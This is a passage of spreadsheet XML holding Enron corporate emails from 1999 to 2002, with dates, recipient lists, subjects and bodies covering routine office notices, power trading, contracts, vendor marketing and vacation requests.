----------------------------------------_x000D_
Email: OrderCenter@RadioShack.com_x000D_
Phone: (800) 464-5365</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sandra.mcnichols@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'carolyn.gilley@enron.com', 'regina.blackshear@enron.com', 'angela.barnett@enron.com', 'angela.gill@enron.com', 'leslie.smith@enron.com', 'eve.puckett@enron.com', 'diane.salcido@enron.com', 'judy.walters@enron.com', 'george.smith@enron.com', 'sharon.peace@enron.com', 'lois.ford@enron.com', 'brenna.neves@enron.com', 'mark.thorne@enron.com', 'judy.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Flu Shots</t>
  </si>
  <si>
    <t>The Flu Vaccine may come in and be available in the next couple of week._x000D_
Since Enron let us know in October to not rely on Enron alone for _x000D_
vaccinations, most of you may have already have shots._x000D_
_x000D_
But, if you plan to be vaccinated at Enron, they are taking requests by _x000D_
e-mail, and will contact those of the waiting list when the vaccine is _x000D_
here.   You would sign up using Health_Center.com._x000D_
_x000D_
For any other questions, call Health Center at x3-6100._x000D_
_x000D_
thanks,_x000D_
Sandy</t>
  </si>
  <si>
    <t>Thu, 6 Sep 2001 13:00:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'randy.katz@enron.com', 'j..broderick@enron.com', 'iris.mack@enron.com', 'diana.allen@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'l..day@enron.com', 'hicham.benjelloun@enron.com', 'harry.arora@enron.com', 'dean.laurent@enron.com', 'joe.quenet@enron.com', 'william.abler@enron.com', 'andrew.greer@enron.com', 'j..sturm@enron.com', 'claudia.guerra@enron.com', 'john.grace@enron.com', 'chris.mrema@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'jewell.wade@enron.com', 'cory.willis@enron.com', 'alexander.mcelreath@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'chris.lenartowicz@enron.com', 'mike.zipperer@enron.com', 'chris.dorland@enron.com', 'd..thomas@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@enron.com', 'bill.rust@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'erik.serio@enron.com', 'willis.philip@enron.com', 'jae.black@enron.com', 'patrick.hanse@enron.com', 'jeff.wolfe@enron.com', 'dana.davis@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'corry.bentley@enron.com', 'andy.pace@enron.com', 'richard.broussard@enron.com', 'ramanarao.tamma@enron.com', 'rika.imai@enron.com', 'jason.kaniss@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'andrew.kandolha@enron.com', 'ashish.mahajan@enron.com', 'jason.choate@enron.com', 'eric.smith@enron.com', 'todd.decook@enron.com', 'tom.may@enron.com', 'm..presto@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'm..forney@enron.com', 'd..poppa@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'jaime.gualy@enron.com', 'gautam.gupta@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'jay.blaine@enron.com', 'gretchen.lotz@enron.com', 'michael.finger@enron.com', 'f..campbell@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'peter.makkai@enron.com', 'alan.chen@enron.com', 'juan.hernandez@enron.com', 'mark.symms@enron.com'})</t>
  </si>
  <si>
    <t>FW: Correction to add day for Earth Sat's presentation</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Guerra, Claudia  _x000D_
Sent:	Thursday, September 06, 2001 2:36 PM_x000D_
To:	Black, Tamara Jae_x000D_
Subject:	FW: Correction to add day for Earth Sat's presentation_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ryan, David  _x000D_
Sent:	Thursday, September 06, 2001 2:33 PM_x000D_
To:	Guerra, Claudia_x000D_
Subject:	Correction to add day for Earth Sat's presentation_x000D_
_x000D_
Claudia, would you please forward this on to all of the traders and fundamentals group? _x000D_
_x000D_
Earth Sat will be here at Enron to present their winter 2001-2002 outlook for temperature and precipitation. _x000D_
_x000D_
Day - Monday, September 10, 2001_x000D_
Time - 3pm to 4pm_x000D_
Location - 30C1_x000D_
_x000D_
Light refreshments will be served. _x000D_
_x000D_
We will have their report around 10 am Monday morning. _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Dave Ryan_x000D_
X3-5462_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 06:58:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'perry.frazier@enron.com', 'esther.dasilva@enron.com', 'sandy.sheffield@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'angela.white@enron.com', 'craig.buehler@enron.com', "paul.y'barbo@enron.com", 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'paul.cherry@enron.com', 'mark.mcconnell@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>Credit Request  Reliant Energy Services</t>
  </si>
  <si>
    <t>Credit Requested_x000D_
_x000D_
Shipper : 		Reliant Energy Services, Inc.	_x000D_
Contract # :		27496	_x000D_
Service Type :		FT_x000D_
MDQ:			30,000 Dth/d _x000D_
Rate:			$0.10_x000D_
Term:			March 1, 2002 through March 31, 2002_x000D_
_x000D_
_x000D_
Dennis P. Lee_x000D_
ETS_x000D_
Gas Logistics_x000D_
(713) 853-1715_x000D_
dennis.lee@enron.com</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 08:00:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'adrianne.engler@enron.com'})</t>
  </si>
  <si>
    <t>32C2 from 4-6pm_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schwieger, Jim _x000D_
Sent: Wednesday, October 03, 2001 9:22 AM_x000D_
To: Engler, Adrianne_x000D_
Subject: RE: Reminder_x000D_
_x000D_
_x000D_
Adrianne -_x000D_
 _x000D_
Where will this be held?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Engler, Adrianne _x000D_
Sent: Monday, October 01, 2001 4:47 PM_x000D_
To: Schwieger, Jim_x000D_
Subject: RE: Reminder_x000D_
_x000D_
_x000D_
Jim - _x000D_
 _x000D_
I apologize for the confusion.  The meeting is scheduled for Wednesday, October 3, 2001 from 4-6pm._x000D_
 _x000D_
Will that work for you, as it is late in the day Wednesday?_x000D_
 _x000D_
Thanks, _x000D_
 _x000D_
Adrianne_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schwieger, Jim _x000D_
Sent: Monday, October 01, 2001 4:43 PM_x000D_
To: Engler, Adrianne_x000D_
Subject: RE: Reminder_x000D_
_x000D_
_x000D_
Adrianne:_x000D_
 _x000D_
The topic will be "Storage".  Would you please confirm that it is on Thursday, October 4, 2001.  I'm out of the office tomorrow so I will have to put a presentation together on Wednesday and Thursday._x000D_
 _x000D_
    Thanks,  Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Engler, Adrianne _x000D_
Sent: Monday, October 01, 2001 4:33 PM_x000D_
To: Schwieger, Jim_x000D_
Subject: Reminder_x000D_
_x000D_
_x000D_
Good Afternoon Jim - _x000D_
 _x000D_
Just a friendly reminder that this Thursday your are scheduled to speak to the Trading Track folks from 4-6pm.  _x000D_
 _x000D_
What do you anticipate your topic to be?_x000D_
 _x000D_
Please let me kow if you have any questions._x000D_
 _x000D_
Kind regards, _x000D_
 _x000D_
Adrianne Engler_x000D_
x57302</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 09:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Please note the following organizational changes in Enron Corp and Enron=20_x000D_
North America._x000D_
_x000D_
Wanda Curry is joining the corporate accounting team working with Rick Caus=_x000D_
ey=20_x000D_
on special projects including certain retail and broadband accounting=20_x000D_
initiatives.  We thank Wanda for her significant contributions to ENA in bo=_x000D_
th=20_x000D_
the planning and reporting function, as well as transaction support=20_x000D_
activities.  She played a key role in making 1999 a successful year at ENA._x000D_
_x000D_
Wes Colwell will join ENA to lead both the planning and reporting and the=_x000D_
=20_x000D_
transaction support accounting functions.  Wes joined Enron in 1999 and mad=_x000D_
e=20_x000D_
key contributions setting up a company-wide accounting transaction support=_x000D_
=20_x000D_
team which assists each of Enron=01,s business units on critical issues and=_x000D_
=20_x000D_
deals._x000D_
_x000D_
Rodney Faldyn rejoins Enron from Azurix to continue to build the corporate=_x000D_
=20_x000D_
accounting transaction support team.  Rodney will continue the effort to gr=_x000D_
ow=20_x000D_
this team and take on the management of key accounting matters that impact=_x000D_
=20_x000D_
Enron._x000D_
_x000D_
These changes will be effective immediately with a transition period during=_x000D_
=20_x000D_
March.  Please join us in congratulating Wanda, Wes and Rodney on their new=_x000D_
=20_x000D_
roles.</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 13:51:24 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Bp Amoco and Coral</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	St. Clair, Carol  _x000D_
Sent:	Wednesday, October 31, 2001 3:38 PM_x000D_
To:	Story, S. Craig_x000D_
Cc:	Bradford, William S.; Kitchen, Louise_x000D_
Subject:	Bp Amoco and Coral_x000D_
_x000D_
Jeff_x000D_
The Amoco netting Agreement has been finalized and will be circulated for signature tomorrow as soon as I get execution sets from their attorney.  On the Coral side, the EEI and Guaranty issues have been agreed to and documentation will be executed no later than tomorrow.  My understanding from Harlan Murphy, a colleague of mine, is that Coral is NOT requiring the Netting Agreement in order to do the ring trades._x000D_
_x000D_
Carol St. Clair_x000D_
EB 4539_x000D_
713-853-3989 (phone)_x000D_
713-646-8537 (fax)_x000D_
281-382-1943 (cell phone)_x000D_
8774545506 (pager)_x000D_
281-890-8862 (home fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Mon, 14 Feb 2000 00:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'postoffice@bluemountain.com'})</t>
  </si>
  <si>
    <t>Just because youre my sister - from Debba</t>
  </si>
  <si>
    <t>You have just received an animated greeting card from Debba_x000D_
You'll see the personal greeting by using the following Web location._x000D_
_x000D_
http://www2.bluemountain.com/cards/box7546c/rhe3ywtsseinfb.htm_x000D_
_x000D_
(Your greeting card will be available for the next 90 days)_x000D_
There is no charge for this service! :)  HAVE a good day and have fun!_x000D_
_x000D_
_____________________________________________________________x000D_
Accessing your card indicates your agreement with our Website Rules_x000D_
posted at the bottom of the following Web location: (You're welcome to send a_x000D_
card at no charge to someone at this location)_x000D_
http://www.bluemountain.com/</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 16:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pma-marketplace@mgfairfax.rr.com'})</t>
  </si>
  <si>
    <t>FREE Load Shapes and More From RER</t>
  </si>
  <si>
    <t xml:space="preserve">	 eShapes is an on-line service designed to help you understand  how _x000D_
electricity and natural gas are used by residential, commercial,  and _x000D_
industrial customers.  The shapes include detailed hourly (8,760)  electric _x000D_
load shapes and daily gas usage profiles.  The National  eShapes Library _x000D_
contains energy usage profiles for ten geographic  regions covering the 48 _x000D_
contiguous states and the District of  Columbia.  Individual shapes from the _x000D_
National Database can be  downloaded for FREE   or you can purchase the _x000D_
entire database on CD.  We've even gone  a bit further!  Residential and _x000D_
commercial state-level and end-use  details are also available.  Industrial _x000D_
shapes will be available  soon!  Be the first to get them!_x000D_
	_x000D_
	MetrixND, our flagship product, is in use at over 100 companies  throughout _x000D_
the United States, Canada, France, and Australia for  short-term load and _x000D_
price forecasting applications.  MetrixND  is widely used in automated _x000D_
systems to forecast daily gas  sendout, hourly loads, retail customer usage, _x000D_
and market prices,  as well as to estimate hourly profiles as part of retail  _x000D_
settlements systems.  See for yourself why forecasters are  raving about _x000D_
MetrixND._x000D_
	_x000D_
	 _x000D_
??[IMAGE]?? 	RER is a professional research and consulting firm with a _x000D_
superior record  in the areas of energy economics and the development of _x000D_
applications  software for the energy industry.  Founded over twenty years _x000D_
ago,  RER specializes in forecasting and energy data analysis._x000D_
	_x000D_
	See why RER rises above the rest.  Look for RER under the balloons at  the _x000D_
PMA conference in Las Vegas, March 14-16.  _x000D_
	And we're not just full of hot air..._x000D_
	_x000D_
	_x000D_
	MetrixND? eShapes_x000D_
	   Regional Economic Research, Inc. (RER)_x000D_
	11236 El Camino Real_x000D_
	San Diego, CA  92130-2650_x000D_
	www.rer.com_x000D_
	800-755-9585 or info@rer.com._x000D_
	_x000D_
	</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 11:18:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laura.vuittonet@enron.com', 'brandee.jackson@enron.com'})</t>
  </si>
  <si>
    <t>1/2 day needed</t>
  </si>
  <si>
    <t>A couple of items on vacation ..._x000D_
_x000D_
1)  both me and Mike Olsen are rolling 1 week of vacation into the new year_x000D_
_x000D_
2)  Please put on your calendars that I will be taking the afternoon off on Feb 19. _x000D_
_x000D_
Thanks._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 04:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.wente@enron.com', 'tracy.ngo@enron.com', 'heather.dunton@enron.com', 'kate.symes@enron.com'})</t>
  </si>
  <si>
    <t>Women and fish</t>
  </si>
  <si>
    <t>Here is the location of the article on women and fish we discussed last night._x000D_
_x000D_
http://www.msnbc.com/news/515559.asp#BODY_x000D_
_x000D_
TA_x000D_
_x000D_
Todd A. Perry    503.464.8122 (work)_x000D_
Enron North America   503.807.6106 (cell)_x000D_
121 SW Salmon Street   503.464.3740 (fax)_x000D_
3WTC 0306    todd.perry@enron.com_x000D_
Portland, OR  97204</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 16:00:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - September Cellular</t>
  </si>
  <si>
    <t>The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Michael T. Olsen_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: September Cellular_x000D_
Report Total: $213.12_x000D_
Amount Due Employee: $213.12_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 09:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Import to fill SC trades</t>
  </si>
  <si>
    <t>Group-_x000D_
_x000D_
Last night there was a strategy that was implemented that needs some _x000D_
clarification.  We bought from EPE at PV and imported to the ISO.  We then _x000D_
did an SC trade (internal interchange) with WESCO in SP15.  When we do this, _x000D_
we do not want to adjust bid our import. If the import were to be cut due to _x000D_
congestion higher than our adjustment bid, we will be subject to replacement _x000D_
costs, which may be as much as the highest out of market energy price.  _x000D_
However, if we send in the import without an adjustment bid, we are subject _x000D_
to a maximum of $250 per Mw.  This is potentially a substantial loss, but a _x000D_
least it is a known (and manageable) downside. In order to mitigate this risk _x000D_
of congestion, we can run a wheel in at Four Corners (with bid at $200) and _x000D_
out at Palo Verde (with bid of $150).  With both the import and the wheel for _x000D_
congestion relief, any congestion will be a wash and our only downside will _x000D_
be our transmission from PV to FC._x000D_
_x000D_
If this does not make complete sense, let me know and I will try to explain _x000D_
it further. _x000D_
_x000D_
Cheers_x000D_
Jesse</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 10:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'enron.cuttings@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'alex.parsons@enron.com', 'julie.green@enron.com', 'enron.group@enron.com', 'joe.gold@enron.com', 'ot@geelmuyden-kiese.no', 'david.leboe@enron.com', 'michael.brown@enron.com', 'eol.europe@enron.com', 'dave.samuels@enron.com', 'kal.shah@enron.com', 'rahil.jafry@enron.com', 'richard.shapiro@enron.com', 'louise.kitchen@enron.com', 'angela.connelly@enron.com', 'paul.goddard@enron.com', 'richard.lewis@enron.com', 'marcello.romano@enron.com', 'david.forster@enron.com', 'bruce.garner@enron.com', 'jackie.gentle@enron.com', 'john.sherriff@enron.com', 'doug.wood@enron.com', 'amita.gosalia@enron.com', 'john.oliver1@enron.com', 'mark.palmer@enron.com', 'thor.lien@enron.com', 'philip.davies@enron.com'})</t>
  </si>
  <si>
    <t>ePower: Europe's power derivatives...(Enron mention)</t>
  </si>
  <si>
    <t>Please find attached the following article/s:_x000D_
'ePower: Virtual exchange concentrating Europe's power derivatives liquidity' - Energy &amp; Power Risk Management_x000D_
_x000D_
 _x000D_
Kind Regards,_x000D_
Kuldeep Chana</t>
  </si>
  <si>
    <t>Fri, 3 Sep 1999 00:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bob.bowen@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Online Trading GTC's</t>
  </si>
  <si>
    <t xml:space="preserve">Bob,_x000D_
_x000D_
Per your request, attached are the online trading GTC's.  It looks like Mark _x000D_
has all of them, not just financial.  I'm going to talk to Stacy about this _x000D_
when she gets in, because I know she was talking about adding it in.  I'll _x000D_
get back to you._x000D_
_x000D_
    _x000D_
_x000D_
     _x000D_
_x000D_
      _x000D_
_x000D_
     _x000D_
_x000D_
      _x000D_
_x000D_
      _x000D_
_x000D_
     _x000D_
_x000D_
       _x000D_
_x000D_
_x000D_
      </t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 01:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">If the plants become an external counterparty, the fee should probably go _x000D_
back to the _x000D_
scale in the original contract.  The assumption being that the original plant _x000D_
financing could afford_x000D_
the escalating fee._x000D_
_x000D_
Let me know if you want me to look into it any further._x000D_
_x000D_
thanks_x000D_
_x000D_
bob_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer@ECT_x000D_
09/20/2000 07:38 AM_x000D_
To: Thomas A Martin/HOU/ECT@ECT, Bob M Hall/NA/Enron@Enron, Steve _x000D_
Jackson/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Cornhusker_x000D_
_x000D_
Please read the message below.  What do you think about increasing the fee?_x000D_
_x000D_
_x000D_
D_x000D_
--------------------- Forwarded by Daren J Farmer/HOU/ECT on 09/20/2000 07:32 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
John Griffith@ENRON_x000D_
09/19/2000 11:28 AM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Cornhusker_x000D_
_x000D_
Darren,_x000D_
_x000D_
How are things going?  Just a note to reiterate what we talked about _x000D_
yesterday.  Rick Hill wanted to know what the admin fee would be if the fee _x000D_
was for an outside counterparty.  This admin fee would be for the life of the _x000D_
project (through 2019).   Also, Mike Mazowita should be calling you to talk _x000D_
about the plant being down this week through the end of the month.  Please _x000D_
let me know if you have any questions or concerns.  Thanks._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 04:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edward.hamb@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'suan.dinh@enron.com'})</t>
  </si>
  <si>
    <t>NEWS:  Legislation for 6.5 cent bill</t>
  </si>
  <si>
    <t xml:space="preserve">* CA Senate passed SBX1 43 today_x000D_
---------------------- Forwarded by Edward Hamb/HOU/EES on 03/13/2001 11:59 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
James M Wood_x000D_
03/12/2001 05:38 PM_x000D_
To: ehamb@enron.com_x000D_
cc:  _x000D_
Subject: NEWS:  Legislation for 6.5 cent bill_x000D_
_x000D_
is it a rate freeze or the rate ceiling _x000D_
---------------------- Forwarded by James M Wood/HOU/EES on 03/12/2001 05:37 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Jennifer Rudolph                           03/12/2001 10:01 AM_x000D_
	_x000D_
_x000D_
To: CA Team_x000D_
cc:  _x000D_
Subject: NEWS:  Legislation for 6.5 cent bill_x000D_
_x000D_
*  from Utility Risk Management_x000D_
_x000D_
---------------------- Forwarded by Jennifer Rudolph/HOU/EES on 03/12/2001 _x000D_
10:00 AM ---------------------------_x000D_
_x000D_
_x000D_
Tamara Johnson_x000D_
03/12/2001 09:54 AM_x000D_
_x000D_
I found out late Friday that the bill passed out of the Senate on Thursday _x000D_
and went to the Assembly for a vote._x000D_
By putting a cap on all customers served by SDG&amp;E, the government is _x000D_
essentially putting customers of all three IOU's on the same footing, which _x000D_
allows for a common surcharge to be levied on all the customers.  The 6.5 _x000D_
cent ceiling is comparable to the frozen rates of SCE and PG&amp;E plus the 1cent _x000D_
surcharge levied in January._x000D_
_x000D_
Here's the analysis that is put out at the Senate..._x000D_
_x000D_
_x000D_
Here's the bill itself..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rosalinda Tijerina_x000D_
03/12/2001 09:41 AM_x000D_
To: Tamara Johnson/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rosalinda Tijerina/HOU/EES on 03/12/2001 _x000D_
09:41 AM ---------------------------_x000D_
From: Jeff Dasovich@ENRON on 03/10/2001 12:03 PM_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly _x000D_
Aden/HOU/EES@EES, Bill Votaw/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol _x000D_
Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT, _x000D_
Christina Liscano/HOU/EES@EES, Craig H Sutter/HOU/EES@EES, Dan _x000D_
Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, _x000D_
Don Black/HOU/EES@EES, Dorothy Youngblood/HOU/ECT@ECT, Douglas _x000D_
Huth/HOU/EES@EES, Edward Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES, _x000D_
Erika Dupre/HOU/EES@EES, Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES, _x000D_
Gayle W Muench/HOU/EES@EES, Ginger Dernehl/NA/Enron@ENRON, Gordon _x000D_
Savage/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Harry _x000D_
Kingerski/NA/Enron@ENRON, Iris Waser/HOU/EES@EES, James D _x000D_
Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James Wright/Western _x000D_
Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, Jeremy _x000D_
Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe Hartsoe/Corp/Enron@ENRON, _x000D_
Karen Denne/Corp/Enron@ENRON, Kathy Bass/HOU/EES@EES, Kathy _x000D_
Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin Hughes/HOU/EES@EES, _x000D_
Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, Mark S _x000D_
Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES, _x000D_
Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael _x000D_
Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, mpalmer@enron.com, Neil _x000D_
Bresnan/HOU/EES@EES, Neil Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Paula _x000D_
Warren/HOU/EES@EES, Richard L Zdunkewicz/HOU/EES@EES, Richard _x000D_
Leibert/HOU/EES@EES, Richard Shapiro/NA/Enron@ENRON, Rita _x000D_
Hennessy/NA/Enron@ENRON, Roger Yang/SFO/EES@EES, Rosalinda _x000D_
Tijerina/HOU/EES@EES, Sandra McCubbin/NA/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Scott Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES, _x000D_
Sharon Dick/HOU/EES@EES, skean@enron.com, Tanya Leslie/HOU/EES@EES, Tasha _x000D_
Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Tim _x000D_
Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, _x000D_
Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, William S _x000D_
Bradford/HOU/ECT@ECT, Kathryn Corbally/Corp/Enron@ENRON, Jubran _x000D_
Whalan/HOU/EES@EES, triley@enron.com, Richard B Sanders/HOU/ECT@ECT, Robert C _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Greg Wolfe/HOU/ECT@ECT, James _x000D_
Wright/Western Region/The Bentley Company@Exchange, Dirk vanUlden/Western _x000D_
Region/The Bentley Company@Exchange, Steve Walker/SFO/EES@EES, Jennifer _x000D_
Rudolph/HOU/EES@EES, Martin Wenzel/SFO/HOU/EES@EES, Douglas _x000D_
Condon/SFO/EES@EES, wgang@enron.com, Scott Govenar &lt;sgovenar@govadv.com&gt;, _x000D_
Hedy Govenar &lt;hgovenar@govadv.com&gt; @ ENRON, jklauber@llgm.com, Mike D _x000D_
Smith/HOU/EES@EES, John Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Janel _x000D_
Guerrero/Corp/Enron@Enron, Eric Letke/DUB/EES@EES_x000D_
cc:  _x000D_
Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 03/10/2001 12:09 PM -----_x000D_
_x000D_
	Jennifer Rudolph@EES_x000D_
	03/08/2001 03:31 PM_x000D_
		 _x000D_
		 To: CA Team_x000D_
		 cc: _x000D_
		 Subject: NEWS: 6.5 cent bill passes Senate_x000D_
_x000D_
_x000D_
* CA Senate passed SBX1 43 today_x000D_
* Now, the bill goes to the Assembly_x000D_
* Looking for article..._x000D_
* More to come_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jul 2002 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'patricia.hunter@enron.com'})</t>
  </si>
  <si>
    <t>ROI</t>
  </si>
  <si>
    <t xml:space="preserve">I think I have the formulas fixed in this one._x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 13:44:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Fundies Call</t>
  </si>
  <si>
    <t>Apparently I have the wrong number. Give me a call when you get out of the meeting._x000D_
_x000D_
Chris_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Holst, Keith  _x000D_
Sent:	Wednesday, October 17, 2001 2:16 PM_x000D_
To:	Dorland, Chris_x000D_
Subject:	FW: Fundies Call_x000D_
_x000D_
 &lt;&lt; File: mtg.xls &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rangel, Ina  _x000D_
Sent:	Wednesday, October 17, 2001 11:53 AM_x000D_
To:	Holst, Keith_x000D_
Subject:	Fundies Call_x000D_
_x000D_
Who needs to participate from Calgary and Portland so I can email them the AT&amp;T conference call number and participant code._x000D_
_x000D_
-Ina</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 05:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/29/01; HourAhead hour: 12;  HourAhead schedule download failed. _x000D_
Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
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Crawler lifetime exceeded.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_x000D_
ERROR: File O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042912.txt is empty.</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 10:21:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: vacation</t>
  </si>
  <si>
    <t>DENIED!!!!!!!!!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Staab, Theresa  _x000D_
Sent:	Thursday, October 18, 2001 11:12 AM_x000D_
To:	Whitt, Mark_x000D_
Cc:	Felling, Amy; Lucci, Paul T._x000D_
Subject:	vacation_x000D_
_x000D_
Mark,_x000D_
I'd like to request vacation for the following dates:_x000D_
Tuesday, November 20th_x000D_
Wednesday, November 21st_x000D_
Monday, Novmeber 26 the_x000D_
Tuesday, November 27th._x000D_
_x000D_
We got our tickets for San Francisco to go to my parents house for Thanksgiving._x000D_
_x000D_
Amy will be here to cover._x000D_
_x000D_
Thanks,_x000D_
Theresa</t>
  </si>
  <si>
    <t>Mon, 15 Jan 2001 01:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Houston trip</t>
  </si>
  <si>
